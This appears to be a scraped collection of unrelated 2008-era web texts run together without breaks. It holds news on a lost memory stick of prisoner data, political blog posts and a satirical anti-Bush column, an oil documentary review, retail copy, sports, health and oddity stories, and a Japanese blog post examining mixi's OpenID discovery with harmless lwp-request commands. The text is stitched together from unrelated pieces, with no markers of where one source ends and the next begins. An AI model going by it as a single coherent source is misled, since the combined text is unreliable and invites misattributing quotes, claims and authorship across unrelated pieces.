The home secretary , Jacqui Smith , yesterday denounced the consultancy firm involved in the development of the ID cards scheme for " completely unacceptable " practice after losing a memory stick containing the personal details of all of the 84,000 prisoners in England and Wales .
The memory stick contained unencrypted information from the electronic system for monitoring offenders through the criminal justice system , including information about 10,000 of the most persistent offenders .
Yesterday , Smith moved to distance the government from the data loss , the latest in a series of security breaches since the high - profile loss in November 2007 of two CDs containing child benefit details of 25 million individuals .
Smith said PA Consulting had broken the terms of its contract in downloading the highly sensitive data .
She said : " It runs against the rules set down both for the holding of government data and set down by the external contractor and certainly set down in the contract that we had with the external contractor . "
The Home Office said no more information was being passed to the firm while the investigation continued and the government was " reviewing the terms of that contract and other contracts with PA Consulting " .
In the last four years PA Consulting has won government contracts worth at least £ 240 m which include , from 2004 , the involvement of the firm in the flagship ID cards scheme .
Jim Cousins , the Labour MP for Newcastle upon Tyne Central , who has asked most parliamentary questions about the firm , said : " I am shocked by the level of expenditure on consultants and even more shocked by the way the government seems to have become dependent on consultants for the delivery of core public services . "
Opposition parties urged the government to reconsider its plan for the introduction of an ID card database following the incident .
Dominic Grieve , the shadow home secretary , said : " The public will be alarmed that the government is happy to entrust their £ 20bn ID card project to the firm involved in this fiasco .
" This will destroy any confidence the public still have in this white elephant and reinforce why it could endanger - rather than strengthen - our security . "
The Liberal Democrats were also not prepared to absolve the home secretary of responsibility .
Their leader , Nick Clegg , accused Smith of being worse than the Keystone Cops at keeping data safe .
Clegg said : " Frankly the Keystone Cops would do a better job running the Home Office and keeping our data safe than this government , and if this government cannot keep the data of thousands of guilty people safe , why on earth should we give them the data of millions of innocent people in an ID card database ? "
David Smith , deputy commissioner for the information commissioner 's office , said : " The data loss by a Home Office contractor demonstrates that personal information can be a toxic liability if it is not handled properly , and reinforces the need for data protection to be taken seriously at all levels . "
Home Office resource accounts for last year show that in March of this year two CDs containing the personal information of seasonal agricultural workers went missing in transit to the UK Borders Agency .
The names , dates of birth , and passport numbers of 3,000 individuals were lost .
Who Destroyed the Republican Party ?
James Joyner · · 40 comments
Billy Hollis joins Rush Limbaugh , Peggy Noonan , and other conservative commenters in trying to figure out who is responsible for destroying the Republican Party and which of the potential nominees would destroy it even more .
He thinks that nominating Mike Huckabee would likely lead to “ a loss of Goldwater - McGovern proportions . ”
I ’m inclined to agree , especially if Barack Obama is the Democratic nominee ; I think it would be closer if Hillary Clinton is his opponent .
At any rate , Huckabee is n’t going to be the nominee .
John McCain might , though , and that scares the hell out of Hollis :
Nominating McCain signifies the end of the GOP as it ’s been envisioned by many since the Reagan years , and only a serious rebuilding effort or a dramatic realignment of political parties will bring back any significant emphasis on freedom , the free market , individual responsibility , and the other principles most of the folks who come around here believe in .
But there ’s no point in blaming McCain .
He ’s just following the pattern laid down by the Bush pair .
Talk a good game , pander , arrange “ grand compromises ” which inevitably lead to expansion of government , and get your place in the history book .
Limited government principles ?
Who needs ’em ?
And the GOP faithful are still out there attempting to scare folks with “ What ?
Any Republican is better than Hillary !
If you small - government types know what ’s good for you , you ’ll get behind the GOP nominee , whoever it is .
Otherwise , it will be a disaster ! ”
Well , it will be a disaster – for the political insiders and those whose life revolves around winning .
The Democrats already suffered through theirs .
In 1994 , the entire Democratic political establishment was shell shocked when the GOP took Congress , by a big margin .
The GOP has not yet faced their own disaster , mostly because they ’ve been blessed with stupid enemies .
But I think it ’s coming , sooner or later .
Sooner , if McCain or Huckabee are the standard bearer .
Later , if the GOP squeezes out one more victory , but just ca n’t internalize the need to stop selling the spending , stop the earmarks , and get serious about their core small - government principles .
You would think that their most successful president of the last century showed them the template they need to succeed , and that they would therefore adopt it .
Apparently not .
As the old saw goes , they might do the right thing – after they ’ve exhausted all other possibilities .
First off , McCain is the fiercest opponent of earmarks and runaway spending in the field by a rather wide margin .
He ’s the guy who opposed the Bush tax cuts , for example , because they were n’t offset by cuts in discretionary spending .
More importantly , though , I reject the idea that McCain — or Bushes 41 and 43 , for that matter — are amoral politicians who simply tack in whichever direction the polls tell them to go .
Hell , McCain ’s positions on immigration , campaign finance , taxes , global warming , torture and a variety of other hot button issues would certainly seem to provide plenty of evidence for that .
Rather , he ’s an 82 percent conservative ( if you take the American Conservative Union ’s rating system as the proper measure ) who simply disagrees with the Movement on some issues .
We have only two political parties in this country and even its leaders do n’t agree with everything in the platform .
Every deviation from the Holy Writ is n’t apostasy ; it ’s life under the big tent .
Ronald Reagan last ran for president 24 years ago .
A lot has changed since then — partly thanks to his policies .
We ’re not fighting the commies any more .
We do n’t have marginal tax rates of 70 percent .
It ’s now been 35 years since Roe v. Wade rather than 11 .
It stands to reason , then , that the policy prescriptions of 1980 are going to need some updating .
And , frankly , Reagan ’s record — as opposed to his rhetoric — is n’t exactly what those who pine for the Good Ole Days seem to think it was .
Reagan did virtually nothing to advance the socially conservative agenda he talked about .
He appointed Sandra Day O’Connor and Anthony Kennedy , two moderate swing votes , to the Supreme Court to go along with Antonin Scalia , his lone conservative appointee * .
And he signed the biggest illegal immigrant amnesty bill in the country ’s history .
He allowed spending to skyrocket under his administration , leaving the country saddled with historic debt .
It ’s 2008 , not 1980 .
Most women work outside the home .
There has n’t been a military draft in more than a generation .
There are significantly more than three television channels .
We ’ve completed the shift from a manufacturing economy to a service economy .
Our political climate has , understandably , changed a little .
Goodness , there ’s a serious chance that a woman or a black man will be our next president ; that was the stuff of stand - up comedy routines in Reagan ’s day .
The campaigns of Duncan Hunter , Tom Tancredo , Ron Paul , Tommy Thompson , and Fred Thompson never got off the ground .
If you thought they ’d be great presidents , you were virtually alone .
Sorry for your loss but it ’s time to move on .
The president represents 300 million - odd Americans and is selected through a grueling process that ensures he ’s vetted by widely varying constituencies .
The primary process runs potential nominees through a gauntlet and then the general election requires appealing to pluralities in enough states to get at least half of the votes in the Electoral College .
Not surprisingly , this means it ’s pretty rare for a truly ideological candidate to win the thing .
Most Americans are n’t particularly ideological , for one thing , and different parts of the country have very different concerns .
So , yes , pragmatism and compromise tends to win the day .
That ’s not very exciting , to be sure , and it can be frustrating for those of us who have very strong ideas about government .
But that ’s life .
Unless something very odd happens , the winners of the Romney - McCain and Obama - Clinton fights will emerge to duke it out during the summer and fall .
Nobody on that list inspires me to do cartwheels .
Nonetheless , I ’ll pick from among them and live with the outcome .
____________
* Well , he did appoint Robert Bork .
Kennedy was actually his third choice for that seat after Bork was , well , Borked , and Douglas Ginsburg was found to be an active dope smoker .
A compelling description of the features that make CL the king of the Perl - Python - Ruby - PHP - Tcl - Lisp language ;)
Lisp is often promoted as a language preferable over others because it has certain features that are unique , well - integrated , or otherwise useful .
What follows is an attempt to highlight a selection of these features of standard Common Lisp , concisely , with appropriate illustrations .
This cake was made for the Queen Mother 's staff at Clarence House
A large slice of cake made to celebrate the wedding of Lady Diana Spencer and Prince Charles has been sold for £ 1,000 at an auction house in Gloucestershire .
The nine inch ( 23 cm ) square piece was given to Moyra Smith , a cleaner at Clarence House in London , by a royal chef in 1981 .
The slice is decorated with the royal coat of arms in icing and was preserved in clingfilm .
It comes with a signed thank you letter to Mrs Smith from the royal couple .
Chris Albury , from the Dominic Winter Auction House in South Cerney , said : " We have seen numerous small pieces of official presentation cake slices from this wedding over the years but this piece is altogether on a different scale .
" The decorative icing of the royal coat of arms is very skilled and while there is some cracking and damage it is in remarkably good condition .
" We understand that 23 wedding cakes were officially made and this is most likely one from a single - tier cake sent to the staff at Clarence House .
" Whoever bought it is unlikely to eat it as it will undoubtedly taste stale and be an expensive experiment . "
The slice of cake was bought by a private collector from the UK who wanted to remain anonymous .
NEW YORK ( CNNMoney.com ) --
Gasoline prices have fallen nearly 40 cents a gallon from their record highs after 34 straight days of declines , according to a daily survey released Wednesday .
The price of regular gasoline fell to $ 3.717 a gallon from $ 3.73 a day earlier , according to a survey of gas station credit card swipes from motorist group AAA and the Oil Price Information Service .
Gas prices have fallen more than 9 % since hitting a high of $ 4.114 a gallon in mid-July , but have gained more than 90 cents over the last 12 months .
There have been several indications that high fuel costs have triggered many Americans to change their habits .
The Energy Department reported Wednesday that gasoline demand has averaged about 9.5 million barrels per day over the past four weeks , which is 1.6 % lower than the same period last year .
Meanwhile , a MasterCard SpendingPulse report released Tuesday showed demand for gas has dropped more than 4 % from year - ago levels .
As pump prices fall , demand may begin to recover .
But it is too early to tell how the falling price of gas will affect demand , according to Beth Heinsohn , senior editor with the Oil Price Information Service .
It will take more than four weeks of data to see if there 's a correlation , Heinsohn said .
" We have yet to see a really rock - solid measure of consumer behavior , " she said .
The recent slide in gas prices comes amid a 22 % decline in crude futures from the record $ 147.27 a barrel they scaled last month .
Diesel : Diesel fuel , which is used to power most trucks and commercial vehicles , fell to $ 4.359 a gallon from $ 4.373 a day before , according to AAA .
Because of its use in shipping and transportation , high diesel prices can drive up operating costs , which companies then pass along to buyers by raising prices .
High fuel prices were partially responsible for driving wholesale prices up 9.8 % over the past 12 months , the sharpest yearly jump since the 1980s .
Ethanol :
The price of E85 , an 85 % ethanol blend , fell to $ 3.035 a gallon on average from $ 3.041 , AAA reported .
Expensive petroleum - based fuels have helped raise the profile of corn - based ethanol , which can be used as a gas alternative in specially configured " flex - fuel " vehicles .
However E85 fuel is difficult to find outside the corn-producing midwest region , and is not sold in some states .
It also generally burns less efficiently than gasoline .
According to AAA estimates , drivers of flex - fuel vehicles running E85 would have to pay the equivalent of $ 3.994 a gallon to get the same mileage as gasoline .
State prices : Gasoline remained above an average of $ 4 a gallon in four states , according to AAA : Alaska , the most expensive state at $ 4.576 a gallon , Hawaii at $ 4.435 a gallon , California at $ 4.018 and Utah at $ 4.014 .
The cheapest gas on average was found in Missouri at $ 3.484 a gallon , followed by South Carolina at $ 3.496 .
Diesel prices were most expensive in Hawaii , with drivers paying an average of $ 5.309 a gallon .
Diesel was cheapest in Missouri , where prices fell to an average of $ 4.085 .
WHAT WE DO
Airworks makes industry defining inflatables .
But more so , we are an artistic company committed to creating fantastic and amazing large scale props .
Our sculptures have to have the look and feel of the objects that they are representing – the last thing that anyone should see is that they are inflatables .
We sometimes get carried away with our attention to detail , but in the end it ’s the small things that make up the whole .
This ethos comes from the fact that we come from the creative / art world , our inspiration is the magic of art and theatre and not mass production .
と言う訳でついに来ましたね。
中の人、お疲れ様でした。
実はさっきまで mixi に行って技術的な意見交換などしてきました。mixi OpenID の技術的な側面なんかを簡単に紹介したいと思います。
ミクシィ認 証
これは普通の OpenID Provider の挙動と同じです。僕のアカウント は
http://mixi.jp/show_profile.pl?id=29704 なので僕の OP Local Identifier は、
https://id.mixi.jp/29704
ここでお気づきの方も居るかと思いますが、OP
Local Identifier 自体も https で提供されています。さて最初の html の内容を確認しておきます 。
< link href = " https://mixi.jp/openid_server.pl " rel = " openid2.provider " title = " [ mixi ] mixi OpenID " /> < link href = " https://mixi.jp/openid_server.pl " rel = " openid.server " title = " [ mixi ] mixi OpenID " />
OP Endpoint URL も https で提供されてますね。ついでに Yadis にも対応との事なので試してみます 。
$ lwp - request -m HEAD https://id.mixi.jp/29704 | grep XRDS X-XRDS - Location : https://mixi.jp/xrds_signon.pl
と返ってくるので 、
$ lwp - request https://mixi.jp/xrds_signon.pl
を実行して 、
xml version = " 1.0 " encoding = " UTF - 8 " < xrds XRDS xmlns xrds = " xri://$xrds " xmlns openid = " http://openid.net/xmlns/1.0 " xmlns = " xri://$xrd * ( $ v* 2.0 ) " > < XRD > < Service priority = " 0 " > < Type >
http://specs.openid.net/auth/2.0/signon
</ Type > < Type > http://openid.net/sreg/1.0 </ Type > < Type > http://openid.net/extensions/sreg/1.1 </ Type > < Type > http://openid.net/srv/ax/1.0 </ Type > < URI > https://mixi.jp/openid_server.pl </ URI > </ Service > < Service priority = " 1 " > < Type > http://openid.net/signon/1.1 </ Type > < Type > http://openid.net/sreg/1.0 </ Type > < Type > http://openid.net/extensions/sreg/1.1 </ Type > < Type > http://openid.net/srv/ax/1.0 </ Type > < URI > https://mixi.jp/openid_server.pl </ URI > </ Service > </ XRD > </ xrds XRDS >
AX や SREG に対応していると言う主張されているのが分かります。一点思ったのはユーザごとに
XRDS 文書を提供してもいいんじゃないのかなと思いました。と言うのも
http://mixi.jp/
に対してディスカバリかけた時も同じ XRDS に行き着くからです。まぁ、いつでも代えられるだろうし、そうでなければならない理由も特に無いのでいいですけどもｗ
Vote for Bush ?
Pay up /
Did you help put America 's worst prez into power ?
Time to make amends
Sure , you could start with an open - palmed apology , a profoundly contrite on - your - knees sort of thing , maybe an open letter in your local paper or a heartfelt speech at your next dinner party whereby you stumble though some sort of " I do n't know what the hell I was thinking " or " I must 've been blind " or " Wow , that mescaline sure was potent " type of defense for your unfortunate and reprehensible choices .
But the fact is , that 's not really gonna cut it .
Of course , you could do the obvious thing and cast your vote in November for Barack Obama , but even I know that 's probably asking too much — and besides , all signs indicate a potential landslide for Obama anyway , given the unprecedented worldwide rush of positive energy , the tremendous cosmic craving for intelligent and new and ingenuous , coupled with a deep undercurrent of karmic revulsion toward the wonky , bloodthirsty agenda of grandpa McCain .
So then , what can you do , all you increasingly humiliated , disillusioned , deeply mistaken Bush voters ?
How can you , having hopefully realized by now the violent error of your ways , take steps both small and large to try and make amends for shoving Dubya down the throat of the world , for your tiny but oh so poisonous contribution to the worst and most demeaning eight years in modern American politics ?
First , let 's be clear :
As tempting as it is , I do not suggest some grand humiliating gesture , some sweetly demeaning spectacle whereby you must dye your hair blue and run naked through the streets of rural Alabama waving a rainbow flag and carrying a bottle of fresh stem cells as you suddenly claim to care deeply about blue fin tuna and Brazilian rain forests and honest sex ed for teens .
Unless you really want to .
Nor do I suggest , say , an immediate " Bush tax , " whereby everything you ever purchase from now until you die will cost 10 percent more than it does for liberals , and every cent of it will go to the arts , and schools , and women 's rights , and alternative fuels , and GLAAD , et al and so on .
Do n't get me wrong , it 's a damn fine idea , just a bit unrealistic .
Let 's keep it simple .
The next time , say , gay marriage comes up in conversation , perhaps you say , well , you know , I do n't really get the gay thing at all and certainly my anxiety about it is rooted somewhere too deep and sad to explore right now , but I 've been doing a bit of actual homework (! ) , and it turns out that homosexuality is simply all over the animal kingdom , across all sorts of species , and animals seem to enjoy it for both survival and pleasure .
Who knew ?
In other words , nature seems to approve .
And is n't nature merely God in a nice grass suit ?
As your baffled pals pick their jaws up off the floor , you can add : Hell , science is pretty much proving homosexuality is biological anyway , not a " lifestyle " choice at all .
And gays in the military ?
Hell , if the badass Israeli army can handle it , the United States sure as hell can , am I right ?
Now , pass me a stogie and let 's go blast some canned pheasant with a shotgun .
See ?
It does n't have to all be liberal tofu gobbledygook .
I know that waking up to the contemptible wrongheadedness that was your support of the BushCo neocon agenda must be painful .
Baby steps , honey .
Baby steps .
Speaking of the military , maybe it 's time you openly acknowledge that you actually can support our troops , enjoy your righteous sense of patriotism , think America is the world 's greatest kick - ass whateveryoulike , and yet not think it 's OK that a secretive and bloodthirsty cadre of inept leaders has wasted trillions of dollars and thousands of young American lives in a failed grab for power and petroleum and megalomania .
You think ?
Which brings up another point :
It 's also perfectly OK to make whatever you do sound like something you thought up , all by yourself .
Yes , progressives have been urging you to raise your awareness of things humane and open - minded for eons .
No matter .
You can take all the credit .
We 're generous that way .
Let 's say you do something as simple as trade in your massive American gas hog for a Mini Cooper .
And now you find you really love your little German - engineered wonder , its handling and efficiency and joyous kick .
Perfectly fine to hide your newfound refinement and tell your macho friends that you did it because you hate giving all that oil dough to those greedy Saudi sheiks — and what 's more , now you can take corners at 50 mph without rolling over and bursting into flame .
Cool , no ?
While you 're at it , mention to your buds that the steaks they 're eating are actually locally raised and grass - fed , not because you give a good goddamn about humane animal treatment or toxic industrial feedlots ( though you really should ) , but because the meat tastes better and costs less and you wanna save some dough to , you know , buy more guns and porn .
Hey , whatever works .
But do n't stop there .
Might as well tell your homies to throw their food scraps in your new compost bin , too , not because you care about garbage , but because you learned how to cultivate some great topsoil in which to grow your heirloom tomatoes for your famous spaghetti sauce for NASCAR night .
Look at you !
Actually caring about the health and the environment , but pretending not to !
Hey , it 's a start .
How about secretly beginning to note the overarching brilliance of , say , Dan Savage as well as the nauseating rancidity of Ann Coulter ?
Or stick a Cabela 's catalog cover over an issue of Mother Jones or the Nation , and read it with an open mind and a bottle of premium chilled sake ?
Or realize , with increasing sense of shame , that across just about every social and environmental issue , the hippies were pretty much right about everything , no matter what you thought of the clothes and the music and the hair ?
Now you 're getting it .
Do n't forget the money .
Feel free to make a series of large , anonymous donations to the Sierra Club , or a local battered women 's shelter , or even Planned Parenthood .
Trust me when I say , the odds are shockingly good your own daughter / son / wife will be incredibly grateful for their wise and informed counsel someday soon , if she or he has n't been already .
You get the idea ?
Really , compared with the disgusting levels of damage wrought by your support of the dark armies of Bush , these suggestions are nothing .
You actually owe quite a bit more .
OK , a lot more .
Incalculable , really .
But for now , let 's be reasonable .
After all , the sooner you realize that the world is , in fact , not America 's bitch , that it 's actually a living , humming organism , interconnected and interdependent in ways and on levels no organized religion or fear - based neocon political agenda can possibly comprehend , much less bomb into submission , well , the sooner we can get our collective s— together and move the human experiment forward once again .
And after what you 've put us all through , it 's the very least you could do .
Mark Morford 's latest book is ' The Daring Spectacle : Adventures in Deviant Journalism ' .
Join Mark on Facebook and Twitter , or email him .
His website is markmorford.com .
For his yoga classes , workshops and retreats , click markmorfordyoga.com .
Mark 's column appears every Wednesday on SFGate , and is frequently cross-posted to Huffington Post .
To join the notification list for this column , click here and remove one article of clothing .
To get on Mark 's personal mailing list , click here and remove three more .
This column also has an RSS feed and a very handy archive page .
At the start of the hearing , Michael Bloch QC , representing Lucasfilm , looked at the armour and helmets surrounding him before telling the judge : " The gentlemen sitting in front of me and around me , who are known throughout the world , are the subject matter of the entire case . "
For the past several days , the past several weeks , the past several years , and for the past several decades , the media , the politicians , and the economists — along with investors , entrepreneurs , and geologists — have obsessed about oil .
Analyses and assessments of oil abound , as thick and opaque as the black stuff itself .
Is it peaking , is it increasing , or is it self - rejuvenating ?
Is its price determined by the market , the cartels , or the futures traders ?
Is it the new gold , or the last century ’s promissory note to this century ’s failing central banks ?
Has it been the motivation for America ’s wars over the past 60 years ?
The answer to all these questions is a not completely confident " Sure ! "
That government we deserve is hard at work in Washington , trying to understand what is happening .
Congress calls to account the oil company executives , damns the traders and the producers , and considers sentencing the rest of us to a new national speed limit .
They do what they can , this crowd of intellectually challenged creatures .
The media does its part to inflame popular distrust of the dwindling number of producers , transporters , processors and gas station owners in the country .
Politicians on both the left and the right use our current dismay over the price of a barrel of oil to promote their various class and cultural enmities .
Was the Iraq invasion and occupation really about oil ?
58 permanent US bases in Iraq with US sovereignty over Iraqi airspace is what the Decider wants — that sounds like some kind of Cold War invasion and occupation to secure a resource flow .
Could n’t be that , of course .
There ’s no oil in Iraq or the region , and back in the day , the Soviets always insisted they had been invited , and that the voluntary mutual pact was one of brotherhood and unity in freedom .
Oops , never mind .
Kudos for the titular Baghdad government for pushing back against the US - dictated and extremely overdue status of forces agreement .
That ’s the spirit .
If — as you read this — you are beginning to feel annoyed and frustrated , I share your angst .
Without more information , and a deeper and wider understanding of history , economics , the market , and even chemistry , engineering , and world politics , it is difficult to make sense of the role of oil in our American lives and the existence and actions of America ’s government .
A new documentary entitled Blood and Oil has just been released , and it goes a long way to preparing a mindset that will create common ground between left and right , pro-war and antiwar , young and old , Americans and the rest of the world .
Narrated by Michael Klare , and based on his 2005 book , Blood and Oil : The Dangers and Consequences of America ’s Growing Dependency on Imported Petroleum , this one - hour documentary is a clear , dispassionate and yet riveting history of America and ( especially but not only ) Middle Eastern oil .
The 2005 book , reviewed here , here and here , is critical of the Bush administration ’s economic and foreign policies , and offers policy prescriptions .
Dr. Klare is a professor of Peace and World Security Studies at Hampshire College , in Amherst , Massachusetts , and has written several other books on resource - based conflict .
There is debate over how much oil motivated and guided the U.S. toppling of Saddam Hussein and the occupation of Iraq .
Like many in Washington , in Iraq , and around the world , Michael Klare believes it was about oil , and our addiction to it , an addiction George W. Bush curiously describes as a " true " fact .
In the book , Klare takes a more deterministic perspective than the system - oriented view of William Clark , author of Petrodollar Warfare , incidentally a view I tend to share .
Klare ’s perspective on the Iraq war in some ways may be problematic for some observers of American politics — it implies organized competence in government over the long term , and discounts a variety of other governmental and political motives for invading Iraq from " Saddam tried to kill my Dad , " " We need to make the Middle East safe for Jesus , " and AIPAC ’s Likudnik enthusiastic paranoia mated with congressional craving for easy re-election .
Blood and Oil has several important advantages over Klare ’s earlier and well - researched book .
First , the 52 - minute presentation is tight , clear , and well - integrated — suitable for home use , classroom use , independent and even corporate television broadcast .
Second , it is strengthened by actual newsreels from the past 80 years , and while some of this may be available on YouTube , or perhaps on the History Channel , there is really amazing stuff here .
You will watch black and white video of FDR ’s secret meeting on a Saudi yacht , something I had never seen or heard of before Blood and Oil .
Lastly , the video is oriented to be informative , not polemic or political , and the Media Education Foundation focuses the power of the visual material and the narrative on simply raising viewer awareness .
A good companion video that would address another important aspect of oil in national and international policy would be the Mises Institute ’s great Federal Reserve primer , Money , Banking and the Federal Reserve .
Government finance through manipulation of market commodities is n’t news , and resource wars are the rule , not the exception .
These two videos , however , viewed in tandem , constitute an education suited to middle school children , young adults , older Americans , teachers and professors , reporters and analysts .
Together , they would also be content - appropriate and incredibly useful for the 534 congressmen and senators not named Ron Paul .
If you teach , use it in the classroom .
If you believe the Iraq invasion was not about oil , watch Blood and Oil and then refine your argument .
If you feel , as I do , that America ’s domestic and foreign energy policy is confusing , and that blood is indeed more valuable than oil , watch Blood and Oil .
Given the intensity of murmurings of expanding the U.S. war to Iran , American Marines extended in Afghanistan , and $ 5 gas , the sooner we all become informed , the better .
The Best of Karen Kwiatkowski
Beach Wedding Clothes for Women , Men , and Kids
Since 2006 we have been putting destination weddings into color not only with our exclusive and unique designer styles of beach wedding attire for men , but also with our innovative customization processes that include numerous customizable clothing options such as color , style , and fit .
We design and manufacture all our formal tropical attire for every beach wedding individually .
We have dressed nearly 50,000 formal occasions .
We know that planning and organizing a beach or tropical wedding is not easy .
However , we believe that clothing matters should not add to the chaos , nor should you have to settle for a mass manufactured attire for your special day .
When considering which formal or casual beach wedding attire to wear for your tropical wedding , there are three important aspects that should be taken into account : style , cut , and color .
Without all three , it is not likely your clothing satisfaction level will reach the 100 % mark .
That is where we come in .
We have taken care of all three of these aspects to create formal beach wedding outfits to satisfy even the most demanding couples .
No matter the size or age of the participants - color choices or style requirements ; we can dress your entire party and give you the exact formal clothing you are looking for that is made from only the highest quality , beach - friendly fabric and embellishments .
With so many things to worry about during the planning phase of your tropical wedding , at least the “ how to dress ” problem will be crossed off of your list .
Adam Gilchrist is leading a player push for Twenty20 to be included in the 2020 Olympics , believing it is an essential step in securing the game 's global future .
With the start of the Beijing event less than a week away , Gilchrist says the cricket " pipedream " is a " potential reality " following the success of the new format and the Indian Premier League .
" It does n't matter where the 2020 Olympic Games are held , but many of us who 've experienced international Twenty20 cricket and the IPL are convinced that cricket should bid to become an Olympic sport in time for the Games , " Gilchrist wrote in the Deccan Chronicle .
Cricket was part of the 1900 Olympics before being cut , but last year it gained " recognition status " from the International Olympic Committee ( IOC ) for two years .
" We have a responsibility to grow our game in new territories and amongst the women of the world , " Gilchrist wrote .
" I believe the Olympic Games is the vehicle the sport should use to aggressively sell the message of our sport to all 202 competing Olympic nations , so our sport is strong and robust in countries where it is currently played , and exciting and ground - breaking in countries who have n't yet caught the ' cricket - bug ' . "
To receive " programme status " at the 2020 Olympics , cricket would need to be approved by the IOC at a meeting seven years before the event .
Twenty - six sports are part of the Beijing schedule and there are currently two vacancies for future Games .
Golf , karate , baseball , softball , rugby sevens and roller sports are among the disciplines currently competing for the right to be involved in 2016 .
Gilchrist believes it is time to start serious lobbying .
" Between 2009 and 2013 cricket would promote itself to the IOC as a prospective sport and , if we get it right , cricket will be invited to the Olympic party in 2020 , " he said .
Each Full Member cricket board has been asked by the ICC to have two national men and women players complete Olympic questionnaires .
The responses in Australia have been favourable and Gilchrist , a key performer in the IPL , has also sounded out excited colleagues from Australia , South Africa and England .
Gilchrist experienced the surge of interest in Twenty20 during his time with the Deccan Chargers earlier this year and is convinced the IPL revolution has " changed cricket forever " .
Now he wants the BCCI 's officials to work with the ICC to help take it to the Olympics .
" They would be investing in the future of the sport because by having a men's and women 's competition at the Olympic Games many more countries would be drawn to cricket , " he said .
" It would n't surprise me if countries like the USA , China , Italy , France and Japan become competitive very quickly in Twenty20 , especially in women 's Twenty20 .
I believe that in time the success of cricket at the Olympic Games will lead to more Test - playing nations , something that the sport will need in the coming century . "
Gilchrist feels the aim is realistic .
" The Olympic movement knows it needs to increase its presence in the Asian subcontinent as India , Pakistan and Bangladesh contribute nearly 22 % of the world 's population .
In theory , this is a win-win for the Olympic movement and the ICC and its members . "
India collected only a silver medal in Athens in 2004 while Pakistan , Sri Lanka and Bangladesh failed to finish in the top three of any event .
Cricket would dramatically increase each of the nations ' chances of reaching the podium while lifting interest in the subcontinent .
Next year 's Twenty20 World Championship in England will be held over 16 days , one day shorter than the Olympic programme .
Supporters of cricket 's push believe the length of the tournament - and its high - energy matches - is another valid reason for its inclusion .
The American Psychological Association said Wednesday there is " no credible evidence " that a single , elective abortion causes mental - health problems for adult women .
The report , which came after a two - year review of published research , was anticipated by both supporters and opponents of legal abortion .
Women 's psychological reaction to the ...
An outspoken Long Island gun owner ’s home was raided by Nassau County detectives , who seized two dozen weapons he lawfully owns just one day after Rep. Carolyn McCarthy ’s office made a 911 call about him .
Freeport resident Gabriel Razzano claims he was targeted in the spring raid for his “ unpopular ” political beliefs .
He ’s now filed a $ 5 million federal lawsuit against the Nassau PD and McCarthy , charging they joined forces to strip him of his guns unconstitutionally .
The case pits Razzano against McCarthy , the most outspoken gun-control advocate in Congress .
A crazed gunman murdered her husband in the infamous 1993 Long Island Rail Road Massacre .
The flap arose on March 19 , when Razzano visited McCarthy ’s Garden City office to discuss an article about an illegal immigrant who was deported but was later nabbed in Freeport for the attempted murder of a cop .
“ The office staff felt that Razzano ’s behavior was disruptive and threatening , ” said Lt. Kevin Smith , a police spokesman .
Razzano ’s home was raided the next morning .
philip.messing@nypost.com
MEXICO CITY ( Reuters ) - Rising food prices around the world are likely to drive poor women to trade sex for basic goods like fish and cooking oil , raising the risk of new AIDS infections , U.N officials said on Monday .
A sex worker sporting a tattoo on her foot participates in a protest in central Sydney December 13 , 2007 .
REUTERS / Tim Wimborne
Delegates at a major AIDS conference in Mexico cited the cases of fisherwomen in the Pacific and women in Kenya desperate for food being forced to sell their bodies , adding to concerns of a new twist in the spread of the deadly pandemic .
“ Food is such a basic need that you can see people really going to great lengths , ” said Fadzai Mukonoweshuro of the U.N. ’s Food and Agriculture Organization in southern Africa .
Climbing food prices -- due to increased use of biofuels , the growing demand for grains to feed a booming Asia , droughts and market speculation -- caused 50 million more people to go hungry last year compared to the year before , the United Nations said .
“ That might lead to various distress responses , one of which on the part of women is having transactional sex to feed their kids , ” Stuart Gillespie of the International Food Policy Research Institute said .
“ Recent studies in Botswana , Swaziland , Malawi , Zambia and Tanzania have shown associations between acute food insecurity and unprotected transactional sex among poor women , ” he said .
Overfishing of tuna in the Pacific has forced Papua New Guinea fisherwomen to abandon their smaller craft and join the crew of larger boats , where they trade sex for food scraps , the officials and delegates said .
Such “ fish for sex ” deals are also common in Kenya on the shores of Lake Victoria , where women fish traders meet incoming boats and sleep with fishermen for a favorable price .
Experts at the conference , a biennial gathering of global medical experts and government officials , also said malnutrition increased the risks for people already infected with AIDS , experts added .
HIV drugs can upset the stomach if taken without food and AIDS patients , many also infected with tuberculosis , need more nutrients and calories .
Without enough food they are more likely to die , said Martin Bloem , chief nutritionist at the World Food Program .
Soaring food and other commodity prices might hinder the fight against AIDS .
“ We really need to watch this very carefully .
We are in a situation of rising oil prices , rising food prices and at the same time the cost of AIDS is going up along with new infections , ” said Kevin De Cock , director of the anti-AIDS program at the World Health Organization .
Attacking both hunger and the disease at the same time can bring special challenges .
In Zimbabwe , some villages will reject food aid if they think it is destined for AIDS patients , claiming it is contaminated , Mukonoweshuro said .
The human immunodeficiency virus infects 33 million people globally , half of them women , and kills 2 million annually .
* Photo : Julien Giraroot / DPPI / Icon SMI * You know it 's hard up here for a blimp .
Or so says Stephane Rousson , a 39 - year - old Frenchman who 's hoping to cross the English Channel in a homemade , pedal - powered airship .
As a child , he was captivated by the Gossamer Albatross , the first entirely human - powered craft to fly the turbulent stretch from England to France .
Hoping to repeat that 1979 feat , Rousson acquired Zeppy , a crank - driven zeppelin .
Built originally by Jean Marc Geiser and his son Luc back in 1984 , the craft 's forward momentum and steering come from a pair of 10 - foot movable propellers , churned by a recumbent bike hanging from the ship 's belly ; Rousson modified the chassis to improve its stability and power .
He has logged more than 30 hours of flight time , including a four - hour hop around the coastal town of Toulon .
But so far , no English Channel .
The problem : Breezes over 5 mph bat the blimp around like a cat playing with a moth .
Also , the heat of the sun raises the temperature of the helium in the Zeppy , which could cause it to explode .
With the channel typically experiencing only three windless days a year , Rousson will have to time his five - hour , 34 - mile flight perfectly .
He plans to try again in September .
Here 's hoping the attempt does n't go down like a lead balloon .
* Rejected headlines : Big Blimpin ' , Keep Your Blimp Legs Strong , Blimp 's My Ride
Start Previous : Clive Thompson on Why Urban Farming Is n't Just for Foodies Next : Japanese Schoolgirl Watch : Transform Yourself in a Dressing Room for Hire
Clackers are the toy with a jillion names .
It was essentially two large marbles attached by a sturdy string with a ring in the center .
You would put your finger in the ring allowing the marbles or balls to hang below .
Here is where the fun starts .
The idea was to get the two balls tapping ( or clacking if you prefer ) against each other by pulling up on the ring lightly .
Once you got the hang of it , you could get them going faster and faster until they were smacking each other above and below your hand in a stunning arc .
These toys are now legendary .
They started finding their way into the schoolyards in the early seventies and in 1971 were yanked from shelves because kids were suffering eye injuries when the fragile , glass - like balls were shattering from the violence of contact with their mates .
